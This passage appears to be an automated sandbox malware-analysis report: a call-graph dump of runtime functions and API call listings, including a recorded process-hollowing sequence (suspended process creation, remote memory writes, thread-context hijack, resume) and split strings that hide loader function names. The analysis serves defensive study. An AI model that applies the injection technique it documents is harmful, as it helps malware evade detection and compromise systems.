14348->14349 14350 ab4aa4 14348->14350 14349->14350 14351 ab49f3 14349->14351 14353 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14350->14353 14359 ab2988 14351->14359 14355 ab4b5d 14353->14355 14355->14291 14358 ab2c7f 46 API calls 14358->14350 14360 aab19b __strnicoll 41 API calls 14359->14360 14361 ab29a8 14360->14361 14379 ab3c28 14361->14379 14363 ab2a6c 14366 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14363->14366 14364 ab2a64 14382 aa4522 14364->14382 14365 ab29d5 14365->14363 14365->14364 14368 ab1e71 __strnicoll 15 API calls 14365->14368 14370 ab29fa __fread_nolock __alloca_probe_16 14365->14370 14369 ab2a8f 14366->14369 14368->14370 14374 ab2c7f 14369->14374 14370->14364 14371 ab3c28 __strnicoll MultiByteToWideChar 14370->14371 14372 ab2a45 14371->14372 14372->14364 14373 ab2a50 GetStringTypeW 14372->14373 14373->14364 14375 aab19b __strnicoll 41 API calls 14374->14375 14376 ab2c92 14375->14376 14389 ab2a91 14376->14389 14381 ab3c39 MultiByteToWideChar 14379->14381 14381->14365 14383 aa452c 14382->14383 14385 aa453d 14382->14385 14383->14385 14386 aaa6c6 14383->14386 14385->14363 14387 aaee48 ___free_lconv_mon 14 API calls 14386->14387 14388 aaa6de 14387->14388 14388->14385 14390 ab2aac ctype 14389->14390 14391 ab3c28 __strnicoll MultiByteToWideChar 14390->14391 14395 ab2af2 14391->14395 14392 ab2c6a 14393 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14392->14393 14394 ab2c7d 14393->14394 14394->14358 14395->14392 14396 ab1e71 __strnicoll 15 API calls 14395->14396 14398 ab2b18 __alloca_probe_16 14395->14398 14409 ab2b9e 14395->14409 14396->14398 14397 aa4522 __freea 14 API calls 14397->14392 14399 ab3c28 __strnicoll MultiByteToWideChar 14398->14399 14398->14409 14400 ab2b5d 14399->14400 14400->14409 14417 aaf4f2 14400->14417 14403 ab2b8f 14407 aaf4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14403->14407 14403->14409 14404 ab2bc7 14405 ab2c52 14404->14405 14408 ab1e71 __strnicoll 15 API calls 14404->14408 14410 ab2bd9 __alloca_probe_16 14404->14410 14406 aa4522 __freea 14 API calls 14405->14406 14406->14409 14407->14409 14408->14410 14409->14397 14410->14405 14411 aaf4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14410->14411 14412 ab2c1c 14411->14412 14412->14405 14426 ab3ca4 14412->14426 14414 ab2c36 14414->14405 14415 ab2c3f 14414->14415 14416 aa4522 __freea 14 API calls 14415->14416 14416->14409 14418 aaf024 std::_Lockit::_Lockit 5 API calls 14417->14418 14419 aaf4fd 14418->14419 14420 aaf52a 14419->14420 14421 aaf503 LCMapStringEx 14419->14421 14422 aaf54f __strnicoll 5 API calls 14420->14422 14425 aaf54a 14421->14425 14424 aaf543 LCMapStringW 14422->14424 14424->14425 14425->14403 14425->14404 14425->14409 14428 ab3cbb WideCharToMultiByte 14426->14428 14428->14414 14429->14296 14440 aa9c89 14430->14440 14432 ab4840 14433 aa9c89 __fread_nolock 41 API calls 14432->14433 14434 ab485f 14433->14434 14435 ab47f4 14434->14435 14436 aaee48 ___free_lconv_mon 14 API calls 14434->14436 14437 ab4812 14435->14437 14436->14435 14454 aaa76a LeaveCriticalSection 14437->14454 14439 ab4800 14439->13944 14441 aa9c9a 14440->14441 14449 aa9c96 ctype 14440->14449 14442 aa9ca1 14441->14442 14443 aa9cb4 __fread_nolock 14441->14443 14444 aab188 __dosmaperr 14 API calls 14442->14444 14447 aa9ceb 14443->14447 14448 aa9ce2 14443->14448 14443->14449 14445 aa9ca6 14444->14445 14446 aa9007 __strnicoll 41 API calls 14445->14446 14446->14449 14447->14449 14452 aab188 __dosmaperr 14 API calls 14447->14452 14450 aab188 __dosmaperr 14 API calls 14448->14450 14449->14432 14451 aa9ce7 14450->14451 14453 aa9007 __strnicoll 41 API calls 14451->14453 14452->14451 14453->14449 14454->14439 14456 aae074 14455->14456 14457 aae082 14455->14457 14456->14457 14462 aae09a 14456->14462 14458 aab188 __dosmaperr 14 API calls 14457->14458 14459 aae08a 14458->14459 14460 aa9007 __strnicoll 41 API calls 14459->14460 14461 aae094 14460->14461 14461->13889 14462->14461 14463 aab188 __dosmaperr 14 API calls 14462->14463 14463->14459 14465 aabde7 14464->14465 14469 aabdb8 14464->14469 14466 aabdfe 14465->14466 14467 aaee48 ___free_lconv_mon 14 API calls 14465->14467 14468 aaee48 ___free_lconv_mon 14 API calls 14466->14468 14467->14465 14468->14469 14469->13892 14471 aa9040 14470->14471 14472 aa8e0b std::locale::_Setgloballocale 8 API calls 14471->14472 14473 aa9055 GetCurrentProcess TerminateProcess 14472->14473 14473->13897 14475 aa1737 __EH_prolog3_catch _strlen 14474->14475 14508 aa1aff 14475->14508 14478 aa18d8 14521 aa1ae4 14478->14521 14480 aa18e0 codecvt 14480->13700 14481 aa179c 14512 aa14f1 14481->14512 14483 aa15d4 _strlen 14482->14483 14658 aa18ee 14483->14658 14485 aa15e1 14485->13702 14487 aa16aa 14486->14487 14489 aa1680 std::ios_base::_Init 14486->14489 14665 aa19c7 14487->14665 14489->13704 14491 abc01c 14490->14491 14492 abc089 14491->14492 14685 aa1e21 14491->14685 14494 abc09c 14492->14494 14495 aa1a7b _Deallocate 41 API calls 14492->14495 14494->13709 14495->14494 14497 aa479f codecvt 43 API calls 14496->14497 14499 abc0c4 14497->14499 14500 aa1a7b _Deallocate 41 API calls 14499->14500 14501 abc1f5 14499->14501 14707 aa1cbf 14499->14707 14500->14499 14502 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14501->14502 14503 abc210 CreateThread WaitForSingleObjectEx 14502->14503 14504 aa1644 14503->14504 14505 aa1658 14504->14505 14506 aa164f 14504->14506 14505->13714 14507 aa1a7b _Deallocate 41 API calls 14506->14507 14507->14505 14510 aa1b1d 14508->14510 14509 aa1b40 14509->14481 14510->14509 14525 aa1ba4 14510->14525 14513 aa154c 14512->14513 14515 aa1508 std::ios_base::_Init 14512->14515 14513->14478 14520 aa1541 14515->14520 14533 aa14c8 14515->14533 14516 aa155a 14539 aa144e 14516->14539 14536 aa5ad1 14520->14536 14522 aa1aec 14521->14522 14523 aa1af7 14522->14523 14654 aa1c62 14522->14654 14523->14480 14526 aa1bb0 __EH_prolog3_catch 14525->14526 14527 aa1c55 codecvt 14526->14527 14528 aa1aff 43 API calls 14526->14528 14527->14509 14531 aa1bcf 14528->14531 14529 aa1c4d 14530 aa1ae4 43 API calls 14529->14530 14530->14527 14531->14529 14532 aa14f1 std::ios_base::_Init 43 API calls 14531->14532 14532->14529 14542 aa13dd 14533->14542 14537 aa5aeb 14536->14537 14538 aa5b18 RaiseException 14536->14538 14537->14538 14538->14516 14651 aa1105 14539->14651 14543 aa15b7 std::ios_base::_Init 43 API calls 14542->14543 14544 aa1401 14543->14544 14551 aa134d 14544->14551 14547 aa1644 std::ios_base::_Init 41 API calls 14548 aa141c 14547->14548 14549 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14548->14549 14550 aa1430 14549->14550 14550->14520 14562 aa1610 14551->14562 14558 aa1644 std::ios_base::_Init 41 API calls 14559 aa1390 14558->14559 14560 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14559->14560 14561 aa13af 14560->14561 14561->14547 14563 aa1630 14562->14563 14582 aa195f 14563->14582 14565 aa136e 14566 aa12cb 14565->14566 14567 aa12fc 14566->14567 14568 aa12e6 _strlen 14566->14568 14570 aa166a std::ios_base::_Init 43 API calls 14567->14570 14569 aa166a std::ios_base::_Init 43 API calls 14568->14569 14569->14567 14571 aa1322 14570->14571 14572 aa1644 std::ios_base::_Init 41 API calls 14571->14572 14573 aa132a std::ios_base::_Init 14572->14573 14574 aa1644 std::ios_base::_Init 41 API calls 14573->14574 14575 aa133d 14574->14575 14576 aa4791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 14575->14576 14577 aa134b 14576->14577 14578 aa1209 14577->14578 14579 aa1216 14578->14579 14633 aa10d0 14579->14633 14583 aa19c1 14582->14583 14587 aa1970 std::ios_base::_Init 14582->14587 14597 aa11fe 14583->14597 14586 aa1977 std::ios_base::_Init ctype 14586->14565 14587->14586 14589 aa1f40 14587->14589 14590 aa1f4b 14589->14590 14591 aa1f53 14589->14591 14600 aa1f6d 14590->14600 14593 aa1f5f 14591->14593 14614 aa479f 14591->14614 14593->14586 14594 aa1f51 14594->14586 14596 aa1f5d 14596->14586 14628 aa3a16 14597->14628 14601 aa118f Concurrency::cancel_current_task 14600->14601 14602 aa1f7c 14600->14602 14606 aa5ad1 Concurrency::cancel_current_task RaiseException 14601->14606 14603 aa479f codecvt 43 API calls 14602->14603 14604 aa1f82 14603->14604 14605 aa1f89 14604->14605 14609 aa8f53 __strnicoll 41 API calls 14604->14609 14605->14594 14607 aa11ab 14606->14607 14608 aa1105 std::bad_exception::bad_exception 42 API calls 14607->14608 14610 aa11b8 14608->14610 14611 aa9026 14609->14611 14610->14594 14612 aa9034 _Deallocate 11 API calls 14611->14612 14613 aa9033 14612->14613 14617 aa47a4 14614->14617 14615 aaa798 _Yarn 15 API calls 14615->14617 14616 aa47be 14616->14596 14617->14615 14617->14616 14618 aadac3 codecvt EnterCriticalSection LeaveCriticalSection 14617->14618 14619 aa47c0 14617->14619 14618->14617 14620 aa118f Concurrency::cancel_current_task 14619->14620 14621 aa47ca codecvt 14619->14621 14622 aa5ad1 Concurrency::cancel_current_task RaiseException 14620->14622 14623 aa5ad1 Concurrency::cancel_current_task RaiseException 14621->14623 14624 aa11ab 14622->14624 14625 aa52ae 14623->14625 14626 aa1105 std::bad_exception::bad_exception 42 API calls 14624->14626 14627 aa11b8 14626->14627 14627->14596 14629 aa39bd std::invalid_argument::invalid_argument 42 API calls 14628->14629 14630 aa3a27 14629->14630 14631 aa5ad1 Concurrency::cancel_current_task RaiseException 14630->14631 14632 aa3a35 14631->14632 14636 aa52eb 14633->14636 14637 aa52f8 14636->14637 14643 aa10fc 14636->14643 14637->14643 14644 aaa798 14637->14644 14640 aa5325 14642 aaa6c6 ___std_exception_destroy 14 API calls 14640->14642 14641 aae066 ___std_exception_copy 41 API calls 14641->14640 14642->14643 14643->14558 14649 ab1e71 __Getctype 14644->14649 14645 ab1eaf 14647 aab188 __dosmaperr 14 API calls 14645->14647 14646 ab1e9a HeapAlloc 14648 aa5315 14646->14648 14646->14649 14647->14648 14648->14640 14648->14641 14649->14645 14649->14646 14650 aadac3 codecvt EnterCriticalSection LeaveCriticalSection 14649->14650 14650->14649 14652 aa52eb ___std_exception_copy 42 API calls 14651->14652 14653 aa1126 14652->14653 14653->14478 14656 aa1c6e __EH_prolog3_catch 14654->14656 14655 aa1caa codecvt 14655->14523 14656->14655 14657 aa14f1 std::ios_base::_Init 43 API calls 14656->14657 14657->14655 14659 aa1959 14658->14659 14662 aa18ff std::ios_base::_Init 14658->14662 14660 aa11fe std::ios_base::_Init 43 API calls 14659->14660 14661 aa195e 14660->14661 14663 aa1f40 std::ios_base::_Init 43 API calls 14662->14663 14664 aa1906 std::ios_base::_Init 14662->14664 14663->14664 14664->14485 14666 aa1a75 14665->14666 14667 aa19e4 std::ios_base::_Init 14665->14667 14668 aa11fe std::ios_base::_Init 43 API calls 14666->14668 14670 aa1f40 std::ios_base::_Init 43 API calls 14667->14670 14669 aa1a7a 14668->14669 14671 aa1a03 std::ios_base::_Init 14670->14671 14673 aa1a43 std::ios_base::_Init 14671->14673 14674 aa1a7b 14671->14674 14673->14489 14675 aa1a95 _Deallocate 14674->14675 14676 aa1a88 14674->14676 14675->14673 14678 aa11dc 14676->14678 14679 aa11f9 14678->14679 14680 aa11f6 14678->14680 14681 aa8f53 __strnicoll 41 API calls 14679->14681 14680->14675 14682 aa9026 14681->14682 14683 aa9034 _Deallocate 11 API calls 14682->14683 14684 aa9033 14683->14684 14686 aa1e2d __EH_prolog3_catch 14685->14686 14687 aa1e4a 14686->14687 14688 aa1f30 14686->14688 14689 aa1e67 14687->14689 14691 aa1f35 14687->14691 14698 aa1f62 14688->14698 14692 aa1f40 std::ios_base::_Init 43 API calls 14689->14692 14701 aa118f 14691->14701 14695 aa1e7d ctype 14692->14695 14696 aa1efc codecvt 14695->14696 14697 aa1a7b _Deallocate 41 API calls 14695->14697 14696->14491 14697->14696 14699 aa3a16 std::_Xinvalid_argument 43 API calls 14698->14699 14700 aa1f6c 14699->14700 14702 aa119d Concurrency::cancel_current_task 14701->14702 14703 aa5ad1 Concurrency::cancel_current_task RaiseException 14702->14703 14704 aa11ab 14703->14704 14705 aa1105 std::bad_exception::bad_exception 42 API calls 14704->14705 14706 aa11b8 14705->14706 14708 aa1ccb __EH_prolog3_catch 14707->14708 14709 aa1ce8 14708->14709 14710 aa1dd2 14708->14710 14711 aa1d05 14709->14711 14713 aa1dd7 14709->14713 14712 aa1f62 43 API calls 14710->14712 14714 aa1f40 std::ios_base::_Init 43 API calls 14711->14714 14712->14713 14715 aa118f Concurrency::cancel_current_task 43 API calls 14713->14715 14717 aa1d1b ctype 14714->14717 14716 aa1ddc 14715->14716 14718 aa1d9e codecvt 14717->14718 14719 aa1a7b _Deallocate 41 API calls 14717->14719 14718->14499 14719->14718 14721 aac0ef 14720->14721 14722 aac101 14720->14722 14747 aac18a GetModuleHandleW 14721->14747 14732 aabf8a 14722->14732 14727 aa477e 14727->13740 14730 aac153 14733 aabf96 __FrameHandler3::FrameUnwindToState 14732->14733 14755 aaa722 EnterCriticalSection 14733->14755 14735 aabfa0 14756 aabfd7 14735->14756 14737 aabfad 14760 aabfcb 14737->14760 14740 aac159 14785 aac1cd 14740->14785 14743 aac177 14745 aac1ef std::locale::_Setgloballocale 3 API calls 14743->14745 14744 aac167 GetCurrentProcess TerminateProcess 14744->14743 14746 aac17f ExitProcess 14745->14746 14748 aac0f4 14747->14748 14748->14722 14749 aac1ef GetModuleHandleExW 14748->14749 14750 aac22e GetProcAddress 14749->14750 14751 aac24f 14749->14751 14750->14751 14754 aac242 14750->14754 14752 aac100 14751->14752 14753 aac255 FreeLibrary 14751->14753 14752->14722 14753->14752 14754->14751 14755->14735 14758 aabfe3 __FrameHandler3::FrameUnwindToState 14756->14758 14757 aac04a std::locale::_Setgloballocale 14757->14737 14758->14757 14763 aaddf4 14758->14763 14784 aaa76a LeaveCriticalSection 14760->14784 14762 aabfb9 14762->14727 14762->14740 14764 aade00 __EH_prolog3 14763->14764 14767 aadb4c 14764->14767 14766 aade27 codecvt 14766->14757 14768 aadb58 __FrameHandler3::FrameUnwindToState 14767->14768 14775 aaa722 EnterCriticalSection 14768->14775 14770 aadb66 14776 aadd04 14770->14776 14775->14770 14777 aadb73 14776->14777 14778 aadd23 14776->14778 14780 aadb9b 14777->14780 14778->14777 14779 aaee48 ___free_lconv_mon 14 API calls 14778->14779 14779->14777 14783 aaa76a LeaveCriticalSection 14780->14783 14782 aadb84 14782->14766 14783->14782 14784->14762 14790 ab547e GetPEB 14785->14790 14788 aac163 14788->14743 14788->14744 14789 aac1d7 GetPEB 14789->14788 14791 ab5498 14790->14791 14792 aac1d2 14790->14792 14794 aaf1a6 14791->14794 14792->14788 14792->14789 14795 aaf123 std::_Lockit::_Lockit 5 API calls 14794->14795 14796 aaf1c2 14795->14796 14796->14792 14798 aadfb8 ___scrt_uninitialize_crt 14797->14798 14799 aadfa6 14797->14799 14798->13733 14800 aadfb4 14799->14800 14802 aa965a 14799->14802 14800->13733 14805 aa94e7 14802->14805 14808 aa93db 14805->14808 14809 aa93e7 __FrameHandler3::FrameUnwindToState 14808->14809 14816 aaa722 EnterCriticalSection 14809->14816 14811 aa945d 14825 aa947b 14811->14825 14815 aa93f1 ___scrt_uninitialize_crt 14815->14811 14817 aa934f 14815->14817 14816->14815 14818 aa935b __FrameHandler3::FrameUnwindToState 14817->14818 14828 aa91d2 EnterCriticalSection 14818->14828 14820 aa9365 ___scrt_uninitialize_crt 14821 aa939e 14820->14821 14829 aa95f5 14820->14829 14842 aa93cf 14821->14842 14944 aaa76a LeaveCriticalSection 14825->14944 14827 aa9469 14827->14800 14828->14820 14830 aa960a _Fputc 14829->14830 14831 aa961c 14830->14831 14832 aa9611 14830->14832 14845 aa958c 14831->14845 14833 aa94e7 ___scrt_uninitialize_crt 70 API calls 14832->14833 14835 aa9617 14833->14835 14837 aa8d43 _Fputc 41 API calls 14835->14837 14838 aa9654 14837->14838 14838->14821 14840 aa963d 14858 aafbc1 14840->14858 14943 aa91e6 LeaveCriticalSection 14842->14943 14844 aa93bd 14844->14815 14846 aa95a5 14845->14846 14850 aa95cc 14845->14850 14847 aaf8e9 __fread_nolock 41 API calls 14846->14847 14846->14850 14848 aa95c1 14847->14848 14869 ab03ec 14848->14869 14850->14835 14851 aaf8e9 14850->14851 14852 aaf90a 14851->14852 14853 aaf8f5 14851->14853 14852->14840 14854 aab188 __dosmaperr 14 API calls 14853->14854 14855 aaf8fa 14854->14855 14856 aa9007 __strnicoll 41 API calls 14855->14856 14857 aaf905 14856->14857 14857->14840 14859 aafbdf 14858->14859 14860 aafbd2 14858->14860 14862 aafc28 14859->14862 14864 aafc06 14859->14864 14861 aab188 __dosmaperr 14 API calls 14860->14861 14866 aafbd7 14861->14866 14863 aab188 __dosmaperr 14 API calls 14862->14863 14865 aafc2d 14863->14865 14910 aafb1f 14864->14910 14868 aa9007 __strnicoll 41 API calls 14865->14868 14866->14835 14868->14866 14870 ab03f8 __FrameHandler3::FrameUnwindToState 14869->14870 14871 ab04bc 14870->14871 14873 ab044d 14870->14873 14879 ab0400 14870->14879 14872 aa8f8a __strnicoll 41 API calls 14871->14872 14872->14879 14880 ab55fd EnterCriticalSection 14873->14880 14875 ab0453 14876 ab0470 14875->14876 14881 ab04f4 14875->14881 14907 ab04b4 14876->14907 14879->14850 14880->14875 14882 ab0519 14881->14882 14906 ab053c __fread_nolock 14881->14906 14883 ab051d 14882->14883 14885 ab057b 14882->14885 14884 aa8f8a __strnicoll 41 API calls 14883->14884 14884->14906 14886 ab0592 14885->14886 14887 ab1cd2 ___scrt_uninitialize_crt 43 API calls 14885->14887 14888 ab0078 ___scrt_uninitialize_crt 42 API calls 14886->14888 14887->14886 14889 ab059c 14888->14889 14890 ab05e2 14889->14890 14891 ab05a2 14889->14891 14892 ab05f6 14890->14892 14893 ab0645 WriteFile 14890->14893 14894 ab05a9 14891->14894 14895 ab05cc 14891->14895 14898 ab05fe 14892->14898 14899 ab0633 14892->14899 14896 ab0667 GetLastError 14893->14896 14893->14906 14902 ab0010 ___scrt_uninitialize_crt 6 API calls 14894->14902 14894->14906 14897 aafc3e ___scrt_uninitialize_crt 47 API calls 14895->14897 14896->14906 14897->14906 14900 ab0603 14898->14900 14901 ab0621 14898->14901 14903 ab00f6 ___scrt_uninitialize_crt 7 API calls 14899->14903 14905 ab01d1 ___scrt_uninitialize_crt 7 API calls 14900->14905 14900->14906 14904 ab02ba ___scrt_uninitialize_crt 8 API calls 14901->14904 14902->14906 14903->14906 14904->14906 14905->14906 14906->14876 14908 ab5620 ___scrt_uninitialize_crt LeaveCriticalSection 14907->14908 14909 ab04ba 14908->14909 14909->14879 14911 aafb2b __FrameHandler3::FrameUnwindToState 14910->14911 14923 ab55fd EnterCriticalSection 14911->14923 14913 aafb3a 14914 aafb7f 14913->14914 14924 ab56d4 14913->14924 14915 aab188 __dosmaperr 14 API calls 14914->14915 14917 aafb86 14915->14917 14940 aafbb5 14917->14940 14918 aafb66 FlushFileBuffers 14918->14917 14919 aafb72 GetLastError 14918->14919 14937 aab175 14919->14937 14923->14913 14925 ab56e1 14924->14925 14926 ab56f6 14924->14926 14927 aab175 __dosmaperr 14 API calls 14925->14927 14928 aab175 __dosmaperr 14 API calls 14926->14928 14931 ab571b 14926->14931 14929 ab56e6 14927->14929 14932 ab5726 14928->14932 14930 aab188 __dosmaperr 14 API calls 14929->14930 14934 ab56ee 14930->14934 14931->14918 14933 aab188 __dosmaperr 14 API calls 14932->14933 14935 ab572e 14933->14935 14934->14918 14936 aa9007 __strnicoll 41 API calls 14935->14936 14936->14934 14938 aaec51 __dosmaperr 14 API calls 14937->14938 14939 aab17a 14938->14939 14939->14914 14941 ab5620 ___scrt_uninitialize_crt LeaveCriticalSection 14940->14941 14942 aafb9e 14941->14942 14942->14866 14943->14844 14944->14827 17760 aac718 17763 aac3e4 17760->17763 17764 aac3f0 __FrameHandler3::FrameUnwindToState 17763->17764 17771 aaa722 EnterCriticalSection 17764->17771 17766 aac3fa 17767 aac428 17766->17767 17770 ab676b __Getctype 14 API calls 17766->17770 17772 aac446 17767->17772 17770->17766 17771->17766 17775 aaa76a LeaveCriticalSection 17772->17775 17774 aac434 17775->17774 18091 aa9140 18092 aa965a ___scrt_uninitialize_crt 70 API calls 18091->18092 18093 aa9148 18092->18093 18101 aaf60c 18093->18101 18095 aa914d 18096 aaf6b7 14 API calls 18095->18096 18097 aa915c DeleteCriticalSection 18096->18097 18097->18095 18098 aa9177 18097->18098 18099 aaee48 ___free_lconv_mon 14 API calls 18098->18099 18100 aa9182 18099->18100 18102 aaf618 __FrameHandler3::FrameUnwindToState 18101->18102 18111 aaa722 EnterCriticalSection 18102->18111 18104 aaf68f 18112 aaf6ae 18104->18112 18105 aaf623 18105->18104 18107 aaf663 DeleteCriticalSection 18105->18107 18109 aa931f 71 API calls 18105->18109 18110 aaee48 ___free_lconv_mon 14 API calls 18107->18110 18109->18105 18110->18105 18111->18105 18115 aaa76a LeaveCriticalSection 18112->18115 18114 aaf69b 18114->18095 18115->18114 16910 aaf85d 16911 aaf869 __FrameHandler3::FrameUnwindToState 16910->16911 16922 aaa722 EnterCriticalSection 16911->16922 16913 aaf870 16923 ab555f 16913->16923 16921 aaf88e 16947 aaf8b4 16921->16947 16922->16913 16924 ab556b __FrameHandler3::FrameUnwindToState 16923->16924 16925 ab5595 16924->16925 16926 ab5574 16924->16926 16950 aaa722 EnterCriticalSection 16925->16950 16928 aab188 __dosmaperr 14 API calls 16926->16928 16929 ab5579 16928->16929 16931 aa9007 __strnicoll 41 API calls 16929->16931 16930 ab55a1 16935 ab55cd 16930->16935 16951 ab54af 16930->16951 16932 aaf87f 16931->16932 16932->16921 16936 aaf6f7 GetStartupInfoW 16932->16936 16958 ab55f4 16935->16958 16937 aaf7a8 16936->16937 16938 aaf714 16936->16938 16942 aaf7ad 16937->16942 16938->16937 16939 ab555f 42 API calls 16938->16939 16940 aaf73c 16939->16940 16940->16937 16941 aaf76c GetFileType 16940->16941 16941->16940 16943 aaf7b4 16942->16943 16944 aaf7f7 GetStdHandle 16943->16944 16945 aaf859 16943->16945 16946 aaf80a GetFileType 16943->16946 16944->16943 16945->16921 16946->16943 16962 aaa76a LeaveCriticalSection 16947->16962 16949 aaf89f 16950->16930 16952 aaedeb __Getctype 14 API calls 16951->16952 16954 ab54c1 16952->16954 16953 ab54ce 16955 aaee48 ___free_lconv_mon 14 API calls 16953->16955 16954->16953 16956 aaf430 6 API calls 16954->16956 16957 ab5523 16955->16957 16956->16954 16957->16930 16961 aaa76a LeaveCriticalSection 16958->16961 16960 ab55fb 16960->16932 16961->16960 16962->16949 14945 ab4d54 14946 ab4d8f 14945->14946 14947 ab4d5d 14945->14947 14948 aaebbb 41 API calls 14947->14948 14949 ab4d80 14948->14949 14950 ab4b5f 52 API calls 14949->14950 14950->14946

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 011702FC
                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0117030F
                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0117032D
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01170351
                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0117037C
                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 011703D4
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0117041F
                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0117045D
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 01170499
                                            • ResumeThread.KERNELBASE(?), ref: 011704A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2291051039.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1170000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Similarity
                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                            • String ID: GetP$Load$aryA$ress
                                            • API String ID: 2687962208-977067982
                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                            • Instruction ID: a6832e48598f8d3b9d5772d48ca9f1586ad56bab468769e8908ec2dc30b7ab52
                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                            • Instruction Fuzzy Hash: 8AB1D57664028AAFDB60CF68CC80BDA77A5FF8C714F158524EA0CAB341D774FA518B94

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00AA172B: __EH_prolog3_catch.LIBCMT ref: 00AA1732
                                              • Part of subcall function 00AA172B: _strlen.LIBCMT ref: 00AA174A
                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00ABC234
                                              • Part of subcall function 00AA15B7: _strlen.LIBCMT ref: 00AA15CF
                                            • _strlen.LIBCMT ref: 00ABC24F
                                            • _strlen.LIBCMT ref: 00ABC265
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00ABC282
                                            • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00ABC2A0
                                              • Part of subcall function 00ABC000: _Deallocate.LIBCONCRT ref: 00ABC097
                                              • Part of subcall function 00ABC0A0: _Deallocate.LIBCONCRT ref: 00ABC1CB
                                            • CreateThread.KERNELBASE(00000000,00000000,00000188,00AC7AC0,00000000,00000000), ref: 00ABC2D1
                                            • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 00ABC2DB
                                              • Part of subcall function 00AA1644: _Deallocate.LIBCONCRT ref: 00AA1653
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strlen$Deallocate$AddressAllocCreateH_prolog3_catchHandleModuleObjectProcSingleThreadVirtualWait
                                            • String ID: Cons$Free$kernel32.dll$ole
                                            • API String ID: 2500176202-3464035140
                                            • Opcode ID: ed46eec522ff9c1f949c36c858d95a13f29161ded48cc057164a394570ddb15a
                                            • Instruction ID: 8eab00bc93083e03e0140859bf46a8809a0c69aae44762ed534b85e1043dd801
                                            • Opcode Fuzzy Hash: ed46eec522ff9c1f949c36c858d95a13f29161ded48cc057164a394570ddb15a
                                            • Instruction Fuzzy Hash: 57215072900208BEDB14FBB0DD8AEBF77BCEB46754B504519F412A71D2EB789D028B24

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 47 aaf058-aaf064 48 aaf0f6-aaf0f9 47->48 49 aaf069-aaf07a 48->49 50 aaf0ff 48->50 52 aaf07c-aaf07f 49->52 53 aaf087-aaf0a0 LoadLibraryExW 49->53 51 aaf101-aaf105 50->51 54 aaf11f-aaf121 52->54 55 aaf085 52->55 56 aaf0a2-aaf0ab GetLastError 53->56 57 aaf106-aaf116 53->57 54->51 59 aaf0f3 55->59 60 aaf0ad-aaf0bf call aae788 56->60 61 aaf0e4-aaf0f1 56->61 57->54 58 aaf118-aaf119 FreeLibrary 57->58 58->54 59->48 60->61 64 aaf0c1-aaf0d3 call aae788 60->64 61->59 64->61 67 aaf0d5-aaf0e2 LoadLibraryExW 64->67 67->57 67->61
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,00AAF165,?,?,00000000,00000000,?,?,00AAF38F,00000021,FlsSetValue,00AC02C0,00AC02C8,00000000), ref: 00AAF119
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
